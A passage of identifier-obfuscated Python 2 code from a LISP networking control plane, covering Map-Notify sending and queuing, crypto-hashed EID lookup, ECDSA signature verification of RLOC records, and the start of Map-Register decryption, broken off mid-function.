if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
def lisp_send_map_notify_ack ( lisp_sockets , eid_records , map_notify , ms ) :
map_notify . map_notify_ack = True
if 100 - 100: i11iIiiIii / i1IIi . I1ii11iIi11i
if 1 - 1: IiII * I1Ii111 / I1ii11iIi11i * i11iIiiIii
if 82 - 82: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo % OoOoOO00 * iIii1I11I1II1 % O0
if 10 - 10: ooOoO0o
ii1i1II = map_notify . encode ( eid_records , ms . password )
map_notify . print_notify ( )
if 69 - 69: I11i + I1IiiI / oO0o
if 89 - 89: i1IIi % OoOoOO00 . I1ii11iIi11i
if 85 - 85: I1Ii111 - oO0o
if 34 - 34: iIii1I11I1II1 / IiII + OoOoOO00 - IiII / ooOoO0o + OoOoOO00
oO00o0oOoo = ms . map_server
lprint ( "Send Map-Notify-Ack to {}" . format (
red ( oO00o0oOoo . print_address ( ) , False ) ) )
lisp_send ( lisp_sockets , oO00o0oOoo , LISP_CTRL_PORT , ii1i1II )
return
if 96 - 96: oO0o
if 44 - 44: OoooooooOO / iII111i * Oo0Ooo % OoOoOO00 . oO0o
if 97 - 97: iIii1I11I1II1 / ooOoO0o
if 16 - 16: Oo0Ooo % IiII
if 48 - 48: I1IiiI . I1Ii111 . o0oOOo0O0Ooo
if 72 - 72: Ii1I * OoO0O00 / OoO0O00
if 39 - 39: oO0o
if 49 - 49: I1IiiI * I1Ii111 . I1IiiI - II111iiii
def lisp_send_multicast_map_notify ( lisp_sockets , site_eid , eid_list , xtr ) :
if 57 - 57: oO0o + O0 - OoOoOO00
oooO0oo0ooO = lisp_map_notify ( lisp_sockets )
oooO0oo0ooO . record_count = 1
oooO0oo0ooO . nonce = lisp_get_control_nonce ( )
oooO0oo0ooO . nonce_key = lisp_hex_string ( oooO0oo0ooO . nonce )
oooO0oo0ooO . etr . copy_address ( xtr )
oooO0oo0ooO . etr_port = LISP_CTRL_PORT
oooO0oo0ooO . eid_list = eid_list
iII1 = oooO0oo0ooO . nonce_key
if 14 - 14: II111iiii + i11iIiiIii + Ii1I / o0oOOo0O0Ooo . OoO0O00
if 93 - 93: o0oOOo0O0Ooo + i1IIi
if 24 - 24: i1IIi
if 54 - 54: iIii1I11I1II1 - IiII + o0oOOo0O0Ooo + I1ii11iIi11i + IiII
if 99 - 99: Oo0Ooo
if 38 - 38: I1ii11iIi11i - I1IiiI
lisp_remove_eid_from_map_notify_queue ( oooO0oo0ooO . eid_list )
if ( lisp_map_notify_queue . has_key ( iII1 ) ) :
oooO0oo0ooO = lisp_map_notify_queue [ iII1 ]
lprint ( "Map-Notify with nonce 0x{} pending for ITR {}" . format ( oooO0oo0ooO . nonce , red ( xtr . print_address_no_iid ( ) , False ) ) )
if 50 - 50: iII111i % OoO0O00 - oO0o + Oo0Ooo . O0 . iII111i
return
if 42 - 42: iII111i + I1ii11iIi11i
if 44 - 44: I1ii11iIi11i % IiII
if 1 - 1: Oo0Ooo + IiII - I1Ii111 / I1Ii111
if 25 - 25: OoOoOO00
if 52 - 52: OOooOOo + IiII
lisp_map_notify_queue [ iII1 ] = oooO0oo0ooO
if 73 - 73: OoooooooOO - I1Ii111 % iII111i / OOooOOo . o0oOOo0O0Ooo - IiII
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if 82 - 82: OOooOOo
I1Ii11 = site_eid . rtrs_in_rloc_set ( )
if ( I1Ii11 ) :
if ( site_eid . is_rtr_in_rloc_set ( xtr ) ) : I1Ii11 = False
if 91 - 91: I1ii11iIi11i / I1IiiI
if 68 - 68: OOooOOo * O0 * I1IiiI
if 20 - 20: iII111i + ooOoO0o . i11iIiiIii
if 51 - 51: OoooooooOO * I1Ii111 * I11i - I1ii11iIi11i + I1Ii111
if 50 - 50: OoooooooOO * II111iiii
OOoo = lisp_eid_record ( )
OOoo . record_ttl = 1440
OOoo . eid . copy_address ( site_eid . eid )
OOoo . group . copy_address ( site_eid . group )
OOoo . rloc_count = 0
for IiIIIi in site_eid . registered_rlocs :
if ( I1Ii11 ^ IiIIIi . is_rtr ( ) ) : continue
OOoo . rloc_count += 1
if 7 - 7: ooOoO0o / I11i * iII111i
ii1i1II = OOoo . encode ( )
if 17 - 17: O0 % I1Ii111
if 28 - 28: i1IIi * ooOoO0o
if 14 - 14: II111iiii + II111iiii - I11i / I11i . OoOoOO00 + OoO0O00
if 92 - 92: II111iiii - II111iiii % IiII
oooO0oo0ooO . print_notify ( )
OOoo . print_record ( " " , False )
if 48 - 48: oO0o / II111iiii + oO0o
if 16 - 16: o0oOOo0O0Ooo % II111iiii - i11iIiiIii - IiII + O0 - i11iIiiIii
if 58 - 58: OoooooooOO / I1ii11iIi11i - Oo0Ooo / II111iiii
if 13 - 13: o0oOOo0O0Ooo + OoOoOO00 * ooOoO0o % IiII
for IiIIIi in site_eid . registered_rlocs :
if ( I1Ii11 ^ IiIIIi . is_rtr ( ) ) : continue
O0000O00O00OO = lisp_rloc_record ( )
O0000O00O00OO . store_rloc_entry ( IiIIIi )
ii1i1II += O0000O00O00OO . encode ( )
O0000O00O00OO . print_record ( " " )
if 18 - 18: I1IiiI . I1ii11iIi11i + Oo0Ooo - iII111i
if 53 - 53: ooOoO0o / IiII
if 36 - 36: iIii1I11I1II1
if 78 - 78: II111iiii * I11i
if 47 - 47: Ii1I
ii1i1II = oooO0oo0ooO . encode ( ii1i1II , "" )
if ( ii1i1II == None ) : return
if 42 - 42: I11i . oO0o - I1IiiI / OoO0O00
if 75 - 75: I1IiiI / OoOoOO00 . I11i * iIii1I11I1II1
if 53 - 53: iIii1I11I1II1
if 8 - 8: O0 - O0 - II111iiii
lisp_send_map_notify ( lisp_sockets , ii1i1II , xtr , LISP_CTRL_PORT )
if 77 - 77: i1IIi - ooOoO0o + O0 . OoO0O00 * I1Ii111 - I11i
if 64 - 64: i1IIi + OoooooooOO + OOooOOo / ooOoO0o % I1IiiI . OoooooooOO
if 96 - 96: II111iiii - OoOoOO00 + oO0o
if 80 - 80: oO0o / OoOoOO00 - I11i / oO0o - iII111i - OoooooooOO
oooO0oo0ooO . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ oooO0oo0ooO ] )
oooO0oo0ooO . retransmit_timer . start ( )
return
if 57 - 57: o0oOOo0O0Ooo
if 37 - 37: iII111i * o0oOOo0O0Ooo
if 23 - 23: ooOoO0o + OoooooooOO * iII111i . I11i
if 2 - 2: iIii1I11I1II1 * I1ii11iIi11i - OoooooooOO
if 93 - 93: iII111i % ooOoO0o * Oo0Ooo
if 34 - 34: O0 * oO0o
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
def lisp_queue_multicast_map_notify ( lisp_sockets , rle_list ) :
oo000oOoO = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 57 - 57: OOooOOo % IiII % i11iIiiIii . iIii1I11I1II1 . o0oOOo0O0Ooo / OOooOOo
for o0000o0o in rle_list :
OOo0OOoOO0 = lisp_site_eid_lookup ( o0000o0o [ 0 ] , o0000o0o [ 1 ] , True )
if ( OOo0OOoOO0 == None ) : continue
if 69 - 69: OoOoOO00 * Ii1I % OoooooooOO % OOooOOo * OoOoOO00
if 20 - 20: IiII
if 17 - 17: o0oOOo0O0Ooo % iIii1I11I1II1
if 66 - 66: OoooooooOO + IiII . II111iiii
if 66 - 66: iIii1I11I1II1 % I11i
if 38 - 38: I1ii11iIi11i * ooOoO0o
if 77 - 77: OOooOOo - i11iIiiIii - I1ii11iIi11i
OOO0O0OOoOo = OOo0OOoOO0 . registered_rlocs
if ( len ( OOO0O0OOoOo ) == 0 ) :
Oo0OOO = { }
for oo0OO0O0 in OOo0OOoOO0 . individual_registrations . values ( ) :
for IiIIIi in oo0OO0O0 . registered_rlocs :
if ( IiIIIi . is_rtr ( ) == False ) : continue
Oo0OOO [ IiIIIi . rloc . print_address ( ) ] = IiIIIi
if 73 - 73: ooOoO0o % O0 % II111iiii / O0 . ooOoO0o
if 40 - 40: OOooOOo + OoO0O00 + oO0o
OOO0O0OOoOo = Oo0OOO . values ( )
if 77 - 77: OoOoOO00 + iIii1I11I1II1 / OoOoOO00 - Ii1I / OoO0O00 + I1IiiI
if 3 - 3: i1IIi % Ii1I . OoO0O00 * iIii1I11I1II1 % I11i
if 64 - 64: iII111i * I1IiiI * IiII * iII111i / i1IIi . IiII
if 30 - 30: OoOoOO00 . oO0o - iIii1I11I1II1 % i1IIi
if 94 - 94: Oo0Ooo + iIii1I11I1II1 . OoO0O00 * oO0o . i1IIi
if 85 - 85: O0 / OoOoOO00 . iII111i
OOoO0Oo = [ ]
oOOo0Oo0OO0OOO = False
if ( OOo0OOoOO0 . eid . address == 0 and OOo0OOoOO0 . eid . mask_len == 0 ) :
oOOOIIiI1i11II1i1 = [ ]
o00 = [ ] if len ( OOO0O0OOoOo ) == 0 else OOO0O0OOoOo [ 0 ] . rle . rle_nodes
if 81 - 81: OoooooooOO + OOooOOo
for Oo0000O00o0 in o00 :
OOoO0Oo . append ( Oo0000O00o0 . address )
oOOOIIiI1i11II1i1 . append ( Oo0000O00o0 . address . print_address_no_iid ( ) )
if 7 - 7: I11i + ooOoO0o
lprint ( "Notify existing RLE-nodes {}" . format ( oOOOIIiI1i11II1i1 ) )
else :
if 28 - 28: OoooooooOO * iII111i / oO0o / iII111i
if 80 - 80: OoO0O00 - I1IiiI + OOooOOo - iII111i / i1IIi
if 11 - 11: i1IIi + O0 * IiII / O0 % I11i . I11i
if 39 - 39: II111iiii . i11iIiiIii + I1IiiI + I1ii11iIi11i
if 6 - 6: O0 % Ii1I . oO0o
for IiIIIi in OOO0O0OOoOo :
if ( IiIIIi . is_rtr ( ) ) : OOoO0Oo . append ( IiIIIi . rloc )
if 91 - 91: O0 - oO0o * O0
if 98 - 98: Ii1I
if 54 - 54: oO0o
if 85 - 85: oO0o % o0oOOo0O0Ooo % IiII
if 84 - 84: IiII . OoO0O00
oOOo0Oo0OO0OOO = ( len ( OOoO0Oo ) != 0 )
if ( oOOo0Oo0OO0OOO == False ) :
O0oiiii1i1i11I = lisp_site_eid_lookup ( o0000o0o [ 0 ] , oo000oOoO , False )
if ( O0oiiii1i1i11I == None ) : continue
if 73 - 73: OoOoOO00
for IiIIIi in O0oiiii1i1i11I . registered_rlocs :
if ( IiIIIi . rloc . is_null ( ) ) : continue
OOoO0Oo . append ( IiIIIi . rloc )
if 47 - 47: oO0o
if 17 - 17: IiII
if 47 - 47: I11i . I1IiiI % ooOoO0o . i11iIiiIii
if 63 - 63: I1ii11iIi11i % I11i % OoooooooOO
if 100 - 100: O0
if 9 - 9: Ii1I
if ( len ( OOoO0Oo ) == 0 ) :
lprint ( "No ITRs or RTRs found for {}, Map-Notify suppressed" . format ( green ( OOo0OOoOO0 . print_eid_tuple ( ) , False ) ) )
if 87 - 87: I1IiiI
continue
if 56 - 56: OOooOOo % oO0o - OoOoOO00
if 27 - 27: I1ii11iIi11i - IiII * OoooooooOO * I1ii11iIi11i + i11iIiiIii . IiII
if 81 - 81: oO0o / iIii1I11I1II1
if 15 - 15: Ii1I + I1IiiI . OOooOOo / OoooooooOO + I11i - I11i
if 27 - 27: Ii1I / o0oOOo0O0Ooo . iIii1I11I1II1 . I1IiiI - OoO0O00
if 28 - 28: ooOoO0o
for i1IIiOoO000o00o00O in OOoO0Oo :
lprint ( "Build Map-Notify to {}TR {} for {}" . format ( "R" if oOOo0Oo0OO0OOO else "x" , red ( i1IIiOoO000o00o00O . print_address_no_iid ( ) , False ) ,
# oO0o . Oo0Ooo % ooOoO0o + I1Ii111 . i11iIiiIii + Ii1I
green ( OOo0OOoOO0 . print_eid_tuple ( ) , False ) ) )
if 61 - 61: IiII + iII111i
Iiii = [ OOo0OOoOO0 . print_eid_tuple ( ) ]
lisp_send_multicast_map_notify ( lisp_sockets , OOo0OOoOO0 , Iiii , i1IIiOoO000o00o00O )
time . sleep ( .001 )
if 74 - 74: OoOoOO00 % OoO0O00 - OoooooooOO * i11iIiiIii
if 20 - 20: OoO0O00 . II111iiii
return
if 70 - 70: i11iIiiIii % Ii1I * IiII / IiII . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i
if 58 - 58: i11iIiiIii % Ii1I + Oo0Ooo - OoOoOO00 - i11iIiiIii / O0
if 36 - 36: OOooOOo
if 42 - 42: OOooOOo * ooOoO0o * i11iIiiIii + OoooooooOO . iIii1I11I1II1
if 95 - 95: i1IIi * O0 / II111iiii * OoOoOO00 * I1IiiI
if 38 - 38: OOooOOo - OoOoOO00 / OoO0O00 / o0oOOo0O0Ooo - i11iIiiIii
if 4 - 4: I1IiiI * o0oOOo0O0Ooo - I11i - OoooooooOO . OoooooooOO
def lisp_find_sig_in_rloc_set ( packet , rloc_count ) :
for i1i1IIIIIIIi in range ( rloc_count ) :
O0000O00O00OO = lisp_rloc_record ( )
packet = O0000O00O00OO . decode ( packet , None )
oO0o0OoO0 = O0000O00O00OO . json
if ( oO0o0OoO0 == None ) : continue
if 39 - 39: OoooooooOO / Oo0Ooo / OoooooooOO * IiII - i1IIi
try :
oO0o0OoO0 = json . loads ( oO0o0OoO0 . json_string )
except :
lprint ( "Found corrupted JSON signature" )
continue
if 29 - 29: II111iiii / I1ii11iIi11i * OOooOOo
if 39 - 39: O0 . OOooOOo
if ( oO0o0OoO0 . has_key ( "signature" ) == False ) : continue
return ( O0000O00O00OO )
if 95 - 95: I11i
return ( None )
if 58 - 58: I1ii11iIi11i / i11iIiiIii + iII111i + I11i / oO0o
if 8 - 8: I1ii11iIi11i
if 100 - 100: OoooooooOO / I11i - Ii1I
if 11 - 11: OoO0O00
if 20 - 20: Oo0Ooo
if 34 - 34: I1Ii111 % i11iIiiIii / oO0o - i1IIi . o0oOOo0O0Ooo / oO0o
if 68 - 68: I1Ii111 % Ii1I * Oo0Ooo - O0 . IiII
if 1 - 1: I1ii11iIi11i
if 18 - 18: i11iIiiIii % OoO0O00 % OOooOOo . OOooOOo * Ii1I / II111iiii
if 81 - 81: iII111i % IiII / I11i
if 50 - 50: IiII + i1IIi % I1Ii111
if 72 - 72: I1Ii111
if 6 - 6: II111iiii - i1IIi
if 78 - 78: OoOoOO00 - Oo0Ooo * II111iiii % iIii1I11I1II1 . i11iIiiIii % iII111i
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
if 98 - 98: OOooOOo + I1IiiI / IiII / OoooooooOO / OOooOOo
def lisp_get_eid_hash ( eid ) :
Ii1II11ii1iIi = None
for OOi1 in lisp_eid_hashes :
if 37 - 37: I1ii11iIi11i - iII111i + OOooOOo / i1IIi * ooOoO0o
if 37 - 37: OoO0O00
if 19 - 19: ooOoO0o
if 4 - 4: Oo0Ooo - i1IIi . Oo0Ooo * I11i . i1IIi + OOooOOo
oOo00Ooo0o0 = OOi1 . instance_id
if ( oOo00Ooo0o0 == - 1 ) : OOi1 . instance_id = eid . instance_id
if 3 - 3: IiII / iII111i * iII111i
Ii1IIII = eid . is_more_specific ( OOi1 )
OOi1 . instance_id = oOo00Ooo0o0
if ( Ii1IIII ) :
Ii1II11ii1iIi = 128 - OOi1 . mask_len
break
if 24 - 24: Ii1I
if 23 - 23: Oo0Ooo * i1IIi / I1IiiI . I11i - I1ii11iIi11i . iIii1I11I1II1
if ( Ii1II11ii1iIi == None ) : return ( None )
if 15 - 15: O0 + o0oOOo0O0Ooo / oO0o
III1 = eid . address
i1iiI11I111I1 = ""
for i1i1IIIIIIIi in range ( 0 , Ii1II11ii1iIi / 16 ) :
O0o00o000oO = III1 & 0xffff
O0o00o000oO = hex ( O0o00o000oO ) [ 2 : - 1 ]
i1iiI11I111I1 = O0o00o000oO . zfill ( 4 ) + ":" + i1iiI11I111I1
III1 >>= 16
if 65 - 65: o0oOOo0O0Ooo
if ( Ii1II11ii1iIi % 16 != 0 ) :
O0o00o000oO = III1 & 0xff
O0o00o000oO = hex ( O0o00o000oO ) [ 2 : - 1 ]
i1iiI11I111I1 = O0o00o000oO . zfill ( 2 ) + ":" + i1iiI11I111I1
if 77 - 77: i1IIi . Oo0Ooo . oO0o + oO0o - i11iIiiIii + I1ii11iIi11i
return ( i1iiI11I111I1 [ 0 : - 1 ] )
if 86 - 86: ooOoO0o . ooOoO0o . OoooooooOO - OoOoOO00 % oO0o
if 81 - 81: Oo0Ooo . OoooooooOO
if 15 - 15: I1Ii111 - I11i * I1IiiI % o0oOOo0O0Ooo
if 75 - 75: oO0o % OoooooooOO % i11iIiiIii . iII111i
if 95 - 95: i11iIiiIii . Ii1I / II111iiii + II111iiii + Ii1I / I11i
if 72 - 72: I1Ii111 . I1Ii111 * O0 + I1ii11iIi11i / Oo0Ooo
if 96 - 96: oO0o . ooOoO0o * Oo0Ooo % ooOoO0o + I1Ii111 + iIii1I11I1II1
if 45 - 45: II111iiii
if 42 - 42: ooOoO0o
if 62 - 62: II111iiii * o0oOOo0O0Ooo . OoO0O00 / II111iiii
if 5 - 5: OoO0O00 + O0 . OoooooooOO + I1IiiI + i1IIi * OOooOOo
def lisp_lookup_public_key ( eid ) :
oOo00Ooo0o0 = eid . instance_id
if 19 - 19: OoooooooOO + i11iIiiIii / II111iiii - Oo0Ooo . OOooOOo
if 10 - 10: oO0o * Oo0Ooo
if 55 - 55: OoO0O00 - i1IIi - I11i * oO0o
if 91 - 91: I1Ii111
if 77 - 77: I1ii11iIi11i . ooOoO0o - iIii1I11I1II1 + Ii1I % II111iiii * II111iiii
IiIIi1I = lisp_get_eid_hash ( eid )
if ( IiIIi1I == None ) : return ( [ None , None , False ] )
if 93 - 93: OOooOOo
IiIIi1I = "hash-" + IiIIi1I
iI1Ii1 = lisp_address ( LISP_AFI_NAME , IiIIi1I , len ( IiIIi1I ) , oOo00Ooo0o0 )
oOoooOOO0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , oOo00Ooo0o0 )
if 65 - 65: i1IIi * ooOoO0o * OoooooooOO - i11iIiiIii + IiII - o0oOOo0O0Ooo
if 12 - 12: I1IiiI
if 34 - 34: o0oOOo0O0Ooo / I1IiiI * i11iIiiIii + I1Ii111 / IiII
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 % iII111i
O0oiiii1i1i11I = lisp_site_eid_lookup ( iI1Ii1 , oOoooOOO0o0 , True )
if ( O0oiiii1i1i11I == None ) : return ( [ iI1Ii1 , None , False ] )
if 80 - 80: OoooooooOO % iII111i * IiII % IiII
if 34 - 34: OoO0O00
if 22 - 22: OOooOOo
if 23 - 23: I1ii11iIi11i
Ooo0O00ooO = None
for OooO0ooO0o0OO in O0oiiii1i1i11I . registered_rlocs :
oOOOo0o0oo = OooO0ooO0o0OO . json
if ( oOOOo0o0oo == None ) : continue
try :
oOOOo0o0oo = json . loads ( oOOOo0o0oo . json_string )
except :
lprint ( "Registered RLOC JSON format is invalid for {}" . format ( IiIIi1I ) )
if 2 - 2: OoOoOO00 . ooOoO0o - II111iiii
return ( [ iI1Ii1 , None , False ] )
if 92 - 92: II111iiii * iII111i
if ( oOOOo0o0oo . has_key ( "public-key" ) == False ) : continue
Ooo0O00ooO = oOOOo0o0oo [ "public-key" ]
break
if 60 - 60: I1IiiI . Ii1I - I1ii11iIi11i + iIii1I11I1II1 / oO0o % I11i
return ( [ iI1Ii1 , Ooo0O00ooO , True ] )
if 38 - 38: I1ii11iIi11i - OoooooooOO + Oo0Ooo
if 74 - 74: i1IIi % ooOoO0o
if 95 - 95: OOooOOo . O0 - OOooOOo
if 5 - 5: OOooOOo % I1Ii111 * II111iiii
if 69 - 69: OoO0O00 . o0oOOo0O0Ooo
if 86 - 86: I1ii11iIi11i
if 51 - 51: O0 % OoO0O00 - I1Ii111
if 82 - 82: OoOoOO00 - OOooOOo . i1IIi / I11i
def lisp_verify_cga_sig ( eid , rloc_record ) :
if 45 - 45: i1IIi / i1IIi . ooOoO0o . O0 / I1IiiI
if 68 - 68: I11i % iIii1I11I1II1 . ooOoO0o . I1Ii111 + OoooooooOO
if 45 - 45: IiII - Ii1I
if 74 - 74: ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
oOOo0OoooOo = json . loads ( rloc_record . json . json_string )
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
if ( lisp_get_eid_hash ( eid ) ) :
IIiII11i1 = eid
elif ( oOOo0OoooOo . has_key ( "signature-eid" ) ) :
ooo0O00O = oOOo0OoooOo [ "signature-eid" ]
IIiII11i1 = lisp_address ( LISP_AFI_IPV6 , ooo0O00O , 0 , 0 )
else :
lprint ( " No signature-eid found in RLOC-record" )
return ( False )
if 91 - 91: o0oOOo0O0Ooo
if 5 - 5: IiII * oO0o - OOooOOo % I1Ii111 / iII111i
if 19 - 19: O0 / OOooOOo / I1Ii111 . o0oOOo0O0Ooo
if 22 - 22: O0 * OOooOOo - OoooooooOO - Ii1I * I1ii11iIi11i
if 21 - 21: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo * II111iiii % iIii1I11I1II1
iI1Ii1 , Ooo0O00ooO , iI1i1I = lisp_lookup_public_key ( IIiII11i1 )
if ( iI1Ii1 == None ) :
iiI1Ii1I = green ( IIiII11i1 . print_address ( ) , False )
lprint ( " Could not parse hash in EID {}" . format ( iiI1Ii1I ) )
return ( False )
if 81 - 81: I11i / oO0o
if 89 - 89: OoOoOO00
OO0Oo0Oo = "found" if iI1i1I else bold ( "not found" , False )
iiI1Ii1I = green ( iI1Ii1 . print_address ( ) , False )
lprint ( " Lookup for crypto-hashed EID {} {}" . format ( iiI1Ii1I , OO0Oo0Oo ) )
if ( iI1i1I == False ) : return ( False )
if 18 - 18: OoO0O00 + OOooOOo
if ( Ooo0O00ooO == None ) :
lprint ( " RLOC-record with public-key not found" )
return ( False )
if 25 - 25: OoOoOO00 * o0oOOo0O0Ooo
if 41 - 41: OoOoOO00
o00ooOOOo = Ooo0O00ooO [ 0 : 8 ] + "..." + Ooo0O00ooO [ - 8 : : ]
lprint ( " RLOC-record with public-key '{}' found" . format ( o00ooOOOo ) )
if 52 - 52: i1IIi - oO0o
if 33 - 33: Ii1I / I1ii11iIi11i . ooOoO0o . OoooooooOO
if 45 - 45: OoO0O00 . I1ii11iIi11i + Ii1I / I11i - ooOoO0o / OoooooooOO
if 44 - 44: OoO0O00 % O0 * IiII + iII111i
if 79 - 79: ooOoO0o
ooOOoo0o = oOOo0OoooOo [ "signature" ]
if 16 - 16: II111iiii . ooOoO0o . i11iIiiIii * Ii1I - o0oOOo0O0Ooo . I1IiiI
try :
oOOo0OoooOo = binascii . a2b_base64 ( ooOOoo0o )
except :
lprint ( " Incorrect padding in signature string" )
return ( False )
if 33 - 33: o0oOOo0O0Ooo % ooOoO0o
if 43 - 43: I1Ii111
o0oO0OO = len ( oOOo0OoooOo )
if ( o0oO0OO & 1 ) :
lprint ( " Signature length is odd, length {}" . format ( o0oO0OO ) )
return ( False )
if 34 - 34: i1IIi
if 56 - 56: Oo0Ooo . O0 + o0oOOo0O0Ooo + ooOoO0o - I1Ii111 + i1IIi
if 25 - 25: OoO0O00 % IiII . i1IIi / OoOoOO00 + OoOoOO00
if 53 - 53: II111iiii % i1IIi + ooOoO0o . I1Ii111
if 52 - 52: I1IiiI + I1Ii111 * oO0o / i11iIiiIii * iIii1I11I1II1
IiI11IiIIi = IIiII11i1 . print_address ( )
if 27 - 27: Oo0Ooo
if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
if 21 - 21: II111iiii
Ooo0O00ooO = binascii . a2b_base64 ( Ooo0O00ooO )
try :
iII1 = ecdsa . VerifyingKey . from_pem ( Ooo0O00ooO )
except :
I1iiiII1Ii1i1 = bold ( "Bad public-key" , False )
lprint ( " {}, not in PEM format" . format ( I1iiiII1Ii1i1 ) )
return ( False )
if 2 - 2: oO0o * I1Ii111 - i11iIiiIii
if 50 - 50: oO0o - O0 / I1IiiI . OoOoOO00 . Oo0Ooo
if 30 - 30: IiII . OoO0O00 + Oo0Ooo
if 48 - 48: iIii1I11I1II1 / i11iIiiIii . OoOoOO00 * I11i
if 1 - 1: IiII . OoOoOO00 * o0oOOo0O0Ooo
if 63 - 63: O0 / Ii1I + I1Ii111 % OoO0O00 % OOooOOo * O0
if 35 - 35: OoO0O00 + OoooooooOO % Oo0Ooo / I11i - O0 . i1IIi
if 76 - 76: IiII % I1IiiI * Ii1I / Ii1I / OoooooooOO + Ii1I
if 19 - 19: OoooooooOO
if 88 - 88: I1IiiI % ooOoO0o % Oo0Ooo - O0
if 71 - 71: OOooOOo % Ii1I - i11iIiiIii - oO0o . ooOoO0o / I1Ii111
try :
I11III111i1I = iII1 . verify ( oOOo0OoooOo , IiI11IiIIi , hashfunc = hashlib . sha256 )
except :
lprint ( " Signature library failed for signature data '{}'" . format ( IiI11IiIIi ) )
if 53 - 53: iII111i . Oo0Ooo
lprint ( " Signature used '{}'" . format ( ooOOoo0o ) )
return ( False )
if 91 - 91: oO0o * OoooooooOO * oO0o % oO0o * II111iiii % I1Ii111
return ( I11III111i1I )
if 8 - 8: Ii1I
if 28 - 28: iII111i / I1ii11iIi11i - OoOoOO00 * Oo0Ooo + Ii1I * OoOoOO00
if 94 - 94: oO0o
if 95 - 95: ooOoO0o * O0 + OOooOOo
if 11 - 11: i1IIi / OoOoOO00 + OoOoOO00 + I1ii11iIi11i + OOooOOo
if 21 - 21: ooOoO0o
if 28 - 28: OoOoOO00 + OoOoOO00 - OoOoOO00 / ooOoO0o
if 81 - 81: oO0o
if 34 - 34: o0oOOo0O0Ooo * OOooOOo - i1IIi * o0oOOo0O0Ooo * Oo0Ooo
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
def lisp_remove_eid_from_map_notify_queue ( eid_list ) :
if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
if 33 - 33: I11i
if 63 - 63: Ii1I % II111iiii / OoOoOO00 + Oo0Ooo
if 28 - 28: OoO0O00 + I1IiiI . oO0o + II111iiii - O0
iI1IiIiI1 = [ ]
for iIi1IIIIi1IiI in eid_list :
for oO0O0000O00 in lisp_map_notify_queue :
oooO0oo0ooO = lisp_map_notify_queue [ oO0O0000O00 ]
if ( iIi1IIIIi1IiI not in oooO0oo0ooO . eid_list ) : continue
if 81 - 81: ooOoO0o . O0 % OoO0O00 + I11i % IiII
iI1IiIiI1 . append ( oO0O0000O00 )
iiIi = oooO0oo0ooO . retransmit_timer
if ( iiIi ) : iiIi . cancel ( )
if 54 - 54: iIii1I11I1II1 * Ii1I
lprint ( "Remove from Map-Notify queue nonce 0x{} for EID {}" . format ( oooO0oo0ooO . nonce_key , green ( iIi1IIIIi1IiI , False ) ) )
if 13 - 13: OoO0O00 - II111iiii . iII111i + OoOoOO00 / i11iIiiIii
if 32 - 32: ooOoO0o / II111iiii / I1ii11iIi11i
if 34 - 34: iIii1I11I1II1
if 47 - 47: OOooOOo * iII111i
if 71 - 71: IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i1IIi . Oo0Ooo
if 3 - 3: OoO0O00 + i11iIiiIii + oO0o * IiII
if 19 - 19: iII111i / II111iiii . I1Ii111 * I1IiiI - OOooOOo
for oO0O0000O00 in iI1IiIiI1 : lisp_map_notify_queue . pop ( oO0O0000O00 )
return
if 70 - 70: OoO0O00
if 42 - 42: OoooooooOO - I1Ii111 + I1ii11iIi11i * iII111i * iII111i / OoO0O00
if 85 - 85: O0 . II111iiii
if 80 - 80: O0 * I11i * I1Ii111
if 89 - 89: Ii1I * OoO0O00 . i1IIi . O0 - IiII - OoOoOO00
if 25 - 25: iII111i + i1IIi
if 64 - 64: IiII % I11i / iIii1I11I1II1
if 66 - 66: Ii1I
def lisp_decrypt_map_register ( packet ) :
if 55 - 55: OOooOOo + I1IiiI + IiII . Ii1I * oO0o
if 71 - 71: IiII - iII111i % I1IiiI * iII111i
if 27 - 27: ooOoO0o - OoO0O00
if 83 - 83: iII111i * OoOoOO00 - O0 * Ii1I
if 79 - 79: I11i / iII111i % Ii1I / OoOoOO00 % O0 / IiII
iIIIIII = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
i1ii11ii1iiI = ( iIIIIII >> 13 ) & 0x1
if ( i1ii11ii1iiI == 0 ) : return ( packet )
if 67 - 67: oO0o . I1IiiI % i1IIi - OoO0O00
IiiiO00O0 = ( iIIIIII >> 14 ) & 0x7
if 26 - 26: I1ii11iIi11i
if 17 - 17: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i * IiII / OoooooooOO + i11iIiiIii
if 4 - 4: Ii1I - OoooooooOO / IiII - IiII . OOooOOo
if 77 - 77: I1Ii111 + iII111i * IiII
try :
iI1Ii1iiiII1II = lisp_ms_encryption_keys [ IiiiO00O0 ]
iI1Ii1iiiII1II = iI1Ii1iiiII1II . zfill ( 32 )
oo0O = "0" * 8
except :
lprint ( "Cannot decrypt Map-Register with key-id {}" . format ( IiiiO00O0 ) )
return ( None )
